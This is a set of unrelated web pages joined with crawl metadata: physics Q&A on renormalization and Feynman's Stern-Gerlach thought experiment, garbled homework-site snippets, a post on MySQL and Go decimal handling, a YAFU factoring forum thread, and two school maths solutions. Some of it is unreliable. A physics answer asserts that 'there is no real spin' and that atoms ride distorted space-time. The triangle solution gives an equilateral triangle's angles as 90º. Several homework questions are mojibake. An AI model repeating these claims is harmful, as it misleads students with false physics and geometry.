The most straightforward use of the $a$-theorem is to determine what kinds of spontaneous symmetry breaking are possible. For example, in the usual QCD with three light flavors, at high energy one has a theory of fermions and gauge fields and at low energy one has a theory of pions. If you tried the same thing with a different, large enough of number of ...
9
You are conflating three conceptually different categories of "regularizations" of seemingly divergent series (and integrals). The type of resummations that Hardy would talk about are similar to the zeta-function regularization - the example that is most familiar to the physicists. For example, $$S=\sum_{n=1}^\infty n= -\frac{1}{12}$$ is the most famous ...
9
One approach is that of Seiberg http://arXiv.org/abs/hep-ph/9309335 which is also expanded upon a little bit (and explained in a slightly different way) by Weinberg http://arXiv.org/abs/hep-th/9803099 The old point of view is based on explicit supergraph computations http://inspirehep.net/record/141168?ln=en The disadvantage of the supergraphs approach ...
8
I believe one has to distinguish two kinds of dualities. AdS/CFT, even in the context where it describes an RG flow (so not the pure AdS_5xS^5 case), is an exact duality to a four-dimensional theory, which interpolates between one well-defined conformal field theory in the UV and another conformal field theory in the IR. So holographic renormalization is in ...
8
The running coupling $\lambda(\mu)$, as a function of renormalization scale $\mu$, does run negative for large $\mu$ in the SM if the Higgs is not too heavy. But "renormalization scales" are not particularly physical things to talk about. A more physical quantity is the renormalization-group improved effective Higgs potential, $V(H)$. For large values of ...
8
Let me take a stab at answering this (somewhat vague) question. You said you are interested in the analytic structure of QFT. But you also mentioned the RG, which is somewhat different. I will try to address the analytic structure of QFT and then emphasize that the renormalization group can be thought of as merely a trick to improve perturbation theory. ...
8
Whether you do your calculations using a cutoff regularization or dimensional regularization or another regularization is just a technical detail that has nothing to do with the existence of the hierarchy problem. Order by order, you will get the same results whatever your chosen regularization or scheme is. The schemes and algorithms may differ by the ...
8
The counterterms at one loop would be $R^2$ operators, because loops are counted by powers of $G_N = 1/M_P^2$. The tree-level Lagrangian is the Einstein Hilbert action $M_P^2 R$, so the one-loop counterterms for logarithmic divergences should be terms that carry no powers of $M_P$ in front. Simply from dimensional analysis, then, these are $R^2$ terms, of ...
8
If you go back to the origins, the difficulty in merging gravity with the other forces mostly stems from general relativity being a purely geometric theory -- again, that's in its original form -- and all the other forces being quantum, by which I mostly mean they are conveyed by well-defined force particles. The photon as the particle that conveys the ...
7
I'm not an expert in this topic too, but I'm trying wrap my head around it. Right now I'm trying to make an adequate hierarchy of concepts related to renormalization. Let me list them and tell how they are related: Fields, Lagrangian (Hamiltonian) and coupling constants. Perturbative calculations. Different scales. Self-similarity. Quantum fields. ...
7
It took the insights of Wilson and Kadanoff to answer this question. Universality. It doesn't matter all that much what the precise details in the ultraviolet are. Under the renormalization group, only a small number of parameters are either relevant or marginal. All the rest are irrelevant. As long as you take care to match up the relevant and marginal ...
6
I think you need to look for the following book, Finite Quantum Electrodynamics: this is not something "fringe" nor some "crackpot" off-shoot. The name of the game is Causal Perturbation Theory, and was pioneered by Epstein, Glaser: "The role of locality in perturbation theory". As far as i understand your question (in the context of your comments, etc), ...
6
I'm not sure about it, but my understanding of this is that the $\int_\Lambda^\infty$ term is essentially constant between different processes, because whatever physics happens at high energies should not be affected by the low-energy processes we are able to control. That way, we can meaningfully calculate differences between two integrals, and the ...
6
Your definition is quite good and works almost always. I'm quite sure it is rigorously true in 2D. You'll actually find it in some lecture notes. Remember that a theory is conformal if the trace of the stress tensor vanishes: $T \equiv T_\mu^{\mu} = 0.$ Indeed there is a folk theorem that states that $T = \sum \beta_I \mathcal{O}^I$ where the sum runs over ...
5
Because we happen to be working at the right energy scale. In general, if there are renormalizable interactions around, they dominate over nonrenormalizable ones, by simple scaling arguments and dimensional analysis. Before the electroweak theory was developed, the Fermi theory of the weak interactions was nonrenormalizable because the leading interactions ...
5
Good question. The short answer is no, cutoff scales have no relevance to string theory. Cutoff scales are given by maximum or minimum energies or distances where the given theory may be applied. This concept is only useful because in quantum field theory, such cutoffs are natural regulators to get rid of short-distance divergences. These divergences ...
Only top voted, non community-wiki answers of a minimum length are eligible | 2013-05-23 08:15:05 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7496365904808044, "perplexity": 453.08143001570244}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368703035278/warc/CC-MAIN-20130516111715-00047-ip-10-60-113-184.ec2.internal.warc.gz"} |
https://physics.stackexchange.com/questions/206429/a-modified-stern-gerlach-apparatus-devised-by-feynman-for-a-thought-experiment | # A modified Stern-Gerlach apparatus devised by Feynman for a thought experiment
I was revising the chapter Spin One in Feynman's lectures. There he considers a somewhat modified apparatus of the Stern-Gerlach type for convenience in explanation in the later parts of the lecture.
For the rest of our discussion, it will be more convenient if we consider a somewhat modified apparatus of the Stern-Gerlach type. The apparatus looks more complicated at first, but it will make all the arguments simpler. Anyway, since they are only “thought experiments,” it doesn’t cost anything to complicate the equipment. (Incidentally, no one has ever done all of the experiments we will describe in just this way, but we know what would happen from the laws of quantum mechanics, which are, of course, based on other similar experiments. These other experiments are harder to understand at the beginning, so we want to describe some idealized—but possible—experiments.)
The first one (on the left) is just the usual Stern-Gerlach magnet and splits the incoming beam of spin-one particles into three separate beams. The second magnet has the same cross section as the first, but is twice as long and the polarity of its magnetic field is opposite the field in magnet 1. The second magnet pushes in the opposite direction on the atomic magnets and bends their paths back toward the axis, as shown in the trajectories drawn in the lower part of the figure. The third magnet is just like the first, and brings the three beams back together again, so that leaves the exit hole along the axis.
See the first magnet $N\to S$ from the bottom divides the beam into three parts :$+, 0,\;\&\;-$. The second magnet has opposite polarity & thus tries to combine the three beams into the single one. But what about the third? It has the same polarity as the first one but still combines the three beams into a single which is contrary to that of the first magnet despite having the same polarity. The first magnet splits the beam while the third magnet 'brings the three beams back together again' although 'the third magnet is just like the first'.
Can anyone explain why despite having the same polarity as the first magnet, the third magnet in spite of splitting combines the three back together again?
• It sounds like the first splits the beams over a length $L$, with, say, $+$ being the top beam. Then the second forces them back toward the axis, which after $L$ combines them into a single beam. But the second is twice as long as the first, so the beam is split again in the second half of the second magnet, this time with $+$ being the bottom beam. The third once again directs $+$ upward, which after $L$ causes the beams to recombine. – Kyle Arean-Raines Sep 11 '15 at 13:36
Don't think of magnets and electrons, just think simpler.
Let's play some ice hockey. To simplify this game, it's just one player, who I'll call "us", with a puck, in a really big rink. There isn't even a proper enemy player, just a big wall in the middle of the rink, trying to stop us. We can only go through a "gap" in the wall. Let's say the puck is moving forward, straight from our goal to the target goal, and we're travelling with it.
We tap it once, say to the left, so that it can go with us towards the gap in the wall.
Then when it's in line with the gap, we tap it once to the right, so that it goes straight. We thereby pass through the opening in the wall with the puck.
Now we tap it again to the right, so that it comes to the center line again. When it's in line with the center line, we tap it again to the left to stop it. That's what this last magnet is doing, it's giving this last tap to stop the things.
The pattern of taps is L, R, R, L. If we are really precise with our taps, or the "wall" is not very big, we can condense the two R taps into one bigger tap 2R, which does both of them. Instead of going straight through the gap it now goes diagonally through the gap, possibly turning right as it goes through, depending on when we tap it.
Let's say the Y direction measures progress towards the other net, with the X direction perpendicular. The puck's horizontal momentum $p_y$ is some constant because there is no friction. Its horizontal momentum $p_x$ however changes as we tap it: it starts at $0$, then goes to $p_1$, then goes to some $-p_2$, then goes to $0$ again. This requires at least three impulses: one of magnitude $p_1$ to take it from $0$ to $p_1$, one of magnitude $-p_1 - p_2$, to take it from $p_1$ to $-p_2$, and one of magnitude $+p_2$, to take it back to $0$.
First of all, I'd like to quickly explain the physics. There is no charge involved here. So, the Lorentz force is zero. The reason why the particles are accelerated is because it's a spin with a corresponding magnetic moment exposed to an inhomogeneous magnetic field. If you look at the solenoids, you see that they are not flat, but there is a "V" shape in the upper solenoid which creates the inhomogeneity.
The first magnet effectively changes the direction of the particle by some angle $\theta$. So, the particle will be displaced in $z$ after some travelling in $y$. To revert the displacement and the direction you need two more magnets. The central one inverts the direction such that the particle travels towards $z=0$ again, but then you need to change the direction with the third magnet for the particle to stay at $z=0$.
A charged particle moving across a uniform magnetic field will curve at a fixed radius related to its charge, its mass, its velocity, and the strength of the magnetic field. Change the direction of the magnetic field, and the particle will curve in the other direction.
Let's talk about the positively-charged particles. The first magnetic field curves the particle's path to the left, say $10\unicode{xb0}$. The second field curves it in the opposite direction, but for twice as long, so you get twice the total curvature ($20\unicode{xb0}$). The third field again curves the particle to the left by $10\unicode{xb0}$.
It's clear that the total curvature is $10 - 20 + 10 = 0\unicode{xb0}$. By symmetry, the left half of the curve should look just like the right half, so you end up with the particle traveling along the path it would have taken had there been no magnets at all.
The same argument applies to the negatively-charged particles, and the neutral particles are even simpler.
Edit: This argument works when the curve is small enough that the magnetic fields are still uniform, and the distance travelled through the three magnets is in the radio of $1:2:1$. As a counterexample, if the first field curved the particle through $90\unicode{xb0}$, then the particle wouldn't even make it to the second magnet.
• +1; yes, I also thought like this but if the beam traversed an angle of $20^\circ$ , then the shape of the beam would not be like that. My assumption is that when the beam is about to do that, the third magnet is inserted such that it opposes the beam to move in that way ultimately to make them converge. – user36790 Sep 12 '15 at 5:56
• First off, an SG apparatus will use electrically neutral atoms. So in no way is the observed motion due to a Lorentz force or cyclotron motion. It is due to the magnetic dipole moment of the atomic spin coupling with the external field. Secondly, this force on a magnetic dipole is related to the change in the magnetic field, and so your comments about "this argument works with uniform field" is misleading, since an SG apparatus is DESIGNED to have highly non-uniform fields (notice the sharp acute angle of the magnets, it is for exactly that reason). – Todd R Jan 5 '16 at 19:41
• @ToddR This is the clue, that a stream of neutral particles get deflected in a magnetic field too. The magnetic dipole moment and the related intrinsic spin are responsible for this. Don't call it Lorentz force if you want, but the mechanism behind is the same: Alignment of magnetic dipole moments and by this of the intrinsic spin -> gyroscopic effect (hand rules) -> photon emission and dis alignment again ... – HolgerFiedler Jan 7 '16 at 5:07
• @HolgerFiedler At least non-relativistically are not the same, as Lorentz requires electric charge and velocity of the particles, and the dipole force requires dipole moment and non-uniform field. Anyways, my point is the question is about SG physics and he answers in a useful way using the example of a charged particle under Lorentz force, but doesn't do enough to specify that it is just an example. A young student reading this answer could easily think SG apparatus works because of moving electric charges in a uniform field. Which is wrong. That's my point. – Todd R Jan 7 '16 at 14:44
The magnetic forces of magnet 1 and magnet 3 are almost counterbalanced by magnet 2. (the polarity of its magnetic field is opposite the field in magnet 1 and magnet 3) So magnet 1 and magnet 3 are almost no more magnets. The splitting and combining done by magnet 2 mainly.
As you know there is no real spin. Atom is not little magnet. The space-time between N and S distorted. It looks like bone of cuttlefish.(b) Atom moves along the distorted space-time by magnet 2, just like earth moves along the distorted space-time by sun.
• They aren't magnets anymore? Why? – Kyle Kanos Jan 5 '16 at 11:10 | 2019-12-08 10:20:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6504143476486206, "perplexity": 325.09991930708753}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540508599.52/warc/CC-MAIN-20191208095535-20191208123535-00035.warc.gz"} |
https://www.techwhiff.com/learn/find-an-epression-for-tle-electric-estenhsi-d/362918 | # Find an eメpression for tle electric estenhsi d lPts due to a rod of length L and uniform charge ...
###### Question:
Find an eメpression for tle electric estenhsi d lPts due to a rod of length L and uniform charge dens-ty λ. The rod is orientel along tle z-axis and is centurel at the ofigin., Sho thet litsnce 9 Ow reduces o Hust of q point chise Q AL at origi 2 (a,b
#### Similar Solved Questions
##### Please state summary/thesis for this case study, strenghts& weakness & advantage and disadvantage of other cards....
please state summary/thesis for this case study, strenghts& weakness & advantage and disadvantage of other cards. Case Study: Lisa's Rewards Do the benefits of a credit card ever justif costs and risks? Background Lisa's dream has just come true. As a teenager growing up in Los An...
##### Molly is an aggressive bond trader who likes to speculate on interest rate swings. Market interes...
Molly is an aggressive bond trader who likes to speculate on interest rate swings. Market interest rates are currently at 10.0% , but she expects them to fall 8.0% within a year. As a result, Molly is thinking about buying either a 25-year, zero-coupon bond or a 20-year, 8.5% bond. (both bonds have ...
##### (1 pt) Use the Comparison Test to determine whether the infinite series is convergent. 1 Σ....
(1 pt) Use the Comparison Test to determine whether the infinite series is convergent. 1 Σ. n3" By the Comparison Test, the infinite series n3" T1 A. converges B. diverges Note: You are allowed only one attempt on this problem....
##### Jack is very health conscious and takes an antioxidant vitamin supplement daily because he’s heard that these vitamins reduce risk for chronic disease. His girlfriend, Jill, thinks that any supplements are unnecessary if one has a healthy, balanced diet.
Jack is very health conscious and takes an antioxidant vitamin supplement daily because he’s heard that these vitamins reduce risk for chronic disease. His girlfriend, Jill, thinks that any supplements are unnecessary if one has a healthy, balanced diet. They bring their questions on what exac...
##### Why doesn't barium nitrate react with sulfuric acid?
Why doesn't barium nitrate react with sulfuric acid?...
##### Apps YouTube Gmail Translate D Genesis 8:20 The.. a AMAZONI Applied Calculus-Spring 2020 Homework: Homework 11...
Apps YouTube Gmail Translate D Genesis 8:20 The.. a AMAZONI Applied Calculus-Spring 2020 Homework: Homework 11 Score: 0 of 1 pt 7.4.1 Minimize 2x + 2y, subject to the constraint 128 - 4x - 4y = 0. The minimum value of the function is | (Type an exact answer in simplified form.) Enter your answer in ...
##### What Disney Hong Kong should do to compete with the ocean park using market mix
What Disney Hong Kong should do to compete with the ocean park using market mix...
##### Exercise 17-9 Using ABC to assess prices LO P3 Way Cool produces two different models of...
Exercise 17-9 Using ABC to assess prices LO P3 Way Cool produces two different models of air conditioners. The company produces the mechanical systems in their components department. The mechanical systems are combined with the housing assembly in its finishing department. The activities, costs, and...
##### 6. Let g(t) = { 2te** t 20 6. Let g(t) be the probability density function...
6. Let g(t) = { 2te** t 20 6. Let g(t) be the probability density function of the continuous 0 t<0 random variable X. a. Verify that g(t) is indeed a probability density function. [8] b. Find the median of X, i.e. the number m such that P(x = m) = { = 0.5. [7]...
##### You sail a boat due north with a speed of vo 8 knots. TheTell-tale, which shows...
You sail a boat due north with a speed of vo 8 knots. TheTell-tale, which shows the direction of the wind relative to the boat, points due east. Your boat then turns and sails due east at the same speed. The tell-tale now points 53 degrees north of west. What is the wind speed (relative to earth)? [...
##### Ment Gradebook ORION Downloadable eTextbook DISTRICT COLLEGE PHYSICS IS TH141 14 signment 08:15 PM Remaining: ng...
ment Gradebook ORION Downloadable eTextbook DISTRICT COLLEGE PHYSICS IS TH141 14 signment 08:15 PM Remaining: ng Pool 22.21 A rigid, circular metal ring begins at rest in a uniform magneti... ZYour answer has been saved and sent for grading. See Gradebook for score details A rigid, circular metal ri...
##### Fifteen less than twice a number is the same as the number plus two. What is the number?
Fifteen less than twice a number is the same as the number plus two. What is the number?...
##### The position function of a particle undergoing Simple Harmonic Motion is given below: D. 2 =...
The position function of a particle undergoing Simple Harmonic Motion is given below: D. 2 = 5 sin (36), where x is in m, and t is in s. Round your answers to the nearest tenth. Do not include units in your answers. (1) What is the particle's period of motion, in s, ? (2) Where will the particle...
##### Please answer with accordance to the schedule Question Two: (25 Marks: 5 marks each): On September...
please answer with accordance to the schedule Question Two: (25 Marks: 5 marks each): On September 1, Reid Supply had an inventory of 15 backpacks at a cost of \$20 each. The company uses a perpetual inventory system. During September, the following transactions and events occurred. Sept. 4 Purcha...
##### class Circle { public: enum Color {UNDEFINED, BLACK, BLUE, GREEN, CYAN,...
class Circle { public: enum Color {UNDEFINED, BLACK, BLUE, GREEN, CYAN, RED}; Circle(int = 0, int = 0, double = 0.0, Color = UNDEFINED); void setX(int); ...
##### Hypothesis Test. Ten pilots performed crisis problem-solving tasks with response time measured in seconds. Each pilot...
Hypothesis Test. Ten pilots performed crisis problem-solving tasks with response time measured in seconds. Each pilot first performed the tasks in a completely sober condition and, 3 hours later, repeated similar tasks after consuming two servings of alcohol. Evaluate whether alcohol has negative ef...
##### How do you factor r^2-9t^2?
How do you factor r^2-9t^2?... | 2023-03-20 15:44:17 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2753180265426636, "perplexity": 6358.352562821342}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943484.34/warc/CC-MAIN-20230320144934-20230320174934-00713.warc.gz"} |
https://www.sobyte.net/post/2022-06/go-mysql-decimal/ | In e-commerce or finance-related scenarios, data such as product prices involve the representation or calculation of decimals, and there is a risk of precision loss if you use the built-in floating-point types of programming languages. In the application area, the decimal type was created, and the MySQL database has built-in support for the decimal data type, while programming languages generally have standard libraries or third-party libraries that provide implementations of the decimal type. This article quickly shows how to implement a full link to read decimal type data without worrying about losing data accuracy.
## Database Tier - MySQL
At the MySQL level, the values of type decimal are represented in binary, and the general conversion process is as follows.
1. dividing the data to be stored into two according to the integer and fractional parts, e.g. 1234567890.1234, into 1234567890 and 1234.
2. for the integer part, divide it in groups of 9 bits of digits each, from the low bits to the high bits, e.g. 1234567890 would be divided into 1 and 234567890.
3. using the shortest byte sequence to represent each grouped integer separately, 1 above being 0b00000001, while 234567890 would correspond to 0x0D-FB-38-D2.
4. for the fractional part, use a similar grouping (from the high bit to the low bit) treatment, i.e. 1234 is represented as 0x04D2.
5. Finally, the highest bit is inverted to get 0x81 0D FB 38 D2 04 D2, which means that 7 bytes are used to represent the number.
Bonus: If it is a decimal number, for example -1234567890.1234, just invert all the bits in step 5 above, that is 0x7E F2 04 C7 2D FB 2D
### Summary
MySQL enables the representation of decimals with strict precision requirements by cleverly designed variable-length binary conversions.
## Network Transport Layer - MySQL
The decimal stored on MySQL’s underlying storage, after we know that it is binary, we also feel relieved about the accuracy issue of persistent storage, however, brings two more problems:
1. data after binary conversion, if the byte sequence to the client, the client obviously can not understand, and coupled with the conversion logic, it is clear that the MySQL server is required to do a reverse conversion from binary data to the real decimal.
2. how does MySQL ensure the security of the converted data transmitted in the database connection?
The answer is simple: plain text.
This can be confirmed by analyzing the packets transmitted by the MySQL connection, and the screenshot shows the decimal data returned by the MySQL server through Wireshark grabbing.
### Summary
Because plain text is used to transfer the data, you don’t have to worry about the precision of decimals during the transfer.
## Application Layer - Golang
In my application, I used golang to develop the application, relying on the shopspring/decimal package to handle the decimal type, and it also implements the sql.Scanner interface, which means I can use it directly to deserialize data returned by database queries. For example, in my code.
1 2 3 4 5 6 7 8 9 // Order ... type Order struct { OrderNo string PurchaseAmount decimal.Decimal Status uint8 } order := new(Order) db.Where("order_no = ?", orderNo).First(order).Error
Without any additional logic, PurchaseAmount is able to deserialize decimal type data exactly.
Nevertheless, I took a look at the implementation of the Scanner interface in the shopspring/decimal package to make sure it was indeed safe.
First, I added two lines of code at the source code to make it easier for me to confirm the type of the underlying data, and to confirm that it is a sequence of bytes before deserialization.
After that, I traced the execution of the code and could see that the decimal package deserializes the data directly as a string.
## Network Transport Layer - protobuf
Considering the risk of integer overflow and loss of floating point precision, I have also standardized on using string types in the protocol specification for external services.
1 2 3 4 5 message Order { string order_no = 1; string purchase_amount = 2; status int32 = 3; }
## Summary
• MySQL uses variable-length binary representation of decimal-type data at the underlying level.
• MySQL uses plain text to represent decimal type data in network transfers.
• Golang programs use shopspring/decimal to handle decimal type data.
• shopspring/decimal uses scientific notation to represent decimal at the bottom, but this article will not expand on that.
• The application foreign service protocol uses strings to represent decimal type data.
## Think
• Using strings to represent decimal type data may introduce a higher number of bytes. | 2022-08-08 11:14:41 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.254357248544693, "perplexity": 1743.4487160500464}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570793.14/warc/CC-MAIN-20220808092125-20220808122125-00186.warc.gz"} |
https://www.mersenneforum.org/showthread.php?s=525320923e8a9cc8b8fbf652f53bd3ff&p=546613 | mersenneforum.org > YAFU three large primes
Register FAQ Search Today's Posts Mark Forums Read
2020-05-22, 04:37 #34 LaurV Romulan Interpreter Jun 2011 Thailand 206078 Posts Wow! Ben, that is freaking wonderful! And you kept it for yourself for such a long time! Now I will have to upgrade yafu... (grrr... still using old versions here and there, you know, if it works, don't fix it...) (unfortunately, since I discovered pari, I did most of my "numerology" in it, so the loops and screws came somehow too late, but be sure I will give it a try, I still have some ideas in a far side corner of the brain, which I never had the time/knowledge/balls to follow...) Last fiddled with by LaurV on 2020-05-22 at 04:39
2020-05-22, 16:24 #35
bsquared
"Ben"
Feb 2007
26×3×17 Posts
Quote:
Originally Posted by LaurV Wow! Ben, that is freaking wonderful! And you kept it for yourself for such a long time! Now I will have to upgrade yafu... (grrr... still using old versions here and there, you know, if it works, don't fix it...) (unfortunately, since I discovered pari, I did most of my "numerology" in it, so the loops and screws came somehow too late, but be sure I will give it a try, I still have some ideas in a far side corner of the brain, which I never had the time/knowledge/balls to follow...)
You'll probably have to get the latest wip-branch SVN, so put it somewhere that it won't bother existing installs. I have had some success getting it to work, but chances are it won't work well But if you give it a shot, let me know how it breaks :)
Last fiddled with by bsquared on 2020-05-22 at 16:24
2020-05-27, 18:48 #36 bsquared "Ben" Feb 2007 26·3·17 Posts I've been spending a little time with the TLP variation again... integrating jasonp's batch factoring code and investigating parameters. The batch factoring code provides a huge speedup for TLP, easily twice as fast as before at C110 sizes. The crossover with DLP quadratic sieve now appears to be around C110, although I'm still not convinced I have found optimal parameters for TLP. There are a lot of influential parameters. So as of now, TLP is still slower than regular DLP in sizes of interest to the quadratic sieve (C95-C100). Code: C110 48178889479314834847826896738914354061668125063983964035428538278448985505047157633738779051249185304620494013 80 threads of cascade-lake based xeon: DLP: 1642 seconds for sieving TLP: 1578 seconds for sieving I've also revisited some of the core sieving code for modern instruction sets (AVX512). Inputs above C75 or so are about 10-20% faster now (tested mostly on cascade-lake xeon system).
Similar Threads Thread Thread Starter Forum Replies Last Post Trilo Riesel Prime Search 3 2013-08-20 00:32 jasonp Msieve 24 2010-06-01 19:14 jasonp Factoring 4 2007-12-04 18:32 fivemack Factoring 18 2007-05-10 12:14 Prime Monster Lounge 34 2004-06-10 18:12
All times are UTC. The time now is 23:48.
Wed Jul 8 23:48:15 UTC 2020 up 105 days, 21:21, 1 user, load averages: 1.49, 1.29, 1.24 | 2020-07-08 23:48:15 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.39999616146087646, "perplexity": 4834.003821455508}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655897707.23/warc/CC-MAIN-20200708211828-20200709001828-00156.warc.gz"} |
http://mathhelpforum.com/algebra/197599-finding-arithmetic-mean.html | Math Help - Finding the arithmetic mean
1. Finding the arithmetic mean
If we have five numbers :X,Y,Z,L,k,the arithmetic mean between X,Y,Z is equal to 8,and the arithmetic mean between X,Y,Z,L,K is equal to 7,what is the arithmetic mean between L,K?
2. Re: Finding the arithmetic mean
$\frac{X+Y+Z}{3}=8$
$\frac{X+Y+X+L+K}{5}=7$
3. Re: Finding the arithmetic mean
So the answer is 5,5?
4. Re: Finding the arithmetic mean
I would write 5.5 but yes, 5,5 in France and elsewhere I believe.. | 2016-04-30 07:49:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 2, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8357086777687073, "perplexity": 4944.950940978566}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-18/segments/1461860111620.85/warc/CC-MAIN-20160428161511-00162-ip-10-239-7-51.ec2.internal.warc.gz"} |
https://www.shaalaa.com/question-bank-solutions/lmn-is-an-equilateral-triangle-lm-14-cm-as-shown-in-figure-three-sectors-are-drawn-with-vertices-as-centres-and-radius-7-cm-find-a-lmn-areas-sector-segment-circle_50471 | Share
# Δ Lmn is an Equilateral Triangle. Lm = 14 Cm. as Shown in Figure, Three Sectors Are Drawn with Vertices as Centres and Radius 7 Cm. Find, a ( δ Lmn) - Geometry
ConceptAreas of Sector and Segment of a Circle
#### Question
$∆$ LMN is an equilateral triangle. LM = 14 cm. As shown in the figure, three sectors are drawn with vertices as centers and radius 7 cm.
Find, A ( $∆$ LMN)
#### Solution
∆LMN is an equilateral triangle.
∴ LM = MN = LN = 14 cm
∠L = ∠M = ∠N = 90º Area of ∆LMN = $\frac{\sqrt{3}}{4} \left( \text{ Side} \right)^2 = \frac{\sqrt{3}}{4} \times \left( 14 \right)^2 = \frac{1 . 732}{4} \times 196$ =84.87 cm2
Is there an error in this question or solution?
#### APPEARS IN
Balbharati Solution for Balbharati Class 10 Mathematics 2 Geometry (2018 to Current)
Chapter 7: Mensuration
Practice set 7.3 | Q: 13.1 | Page no. 155
Solution Δ Lmn is an Equilateral Triangle. Lm = 14 Cm. as Shown in Figure, Three Sectors Are Drawn with Vertices as Centres and Radius 7 Cm. Find, a ( δ Lmn) Concept: Areas of Sector and Segment of a Circle.
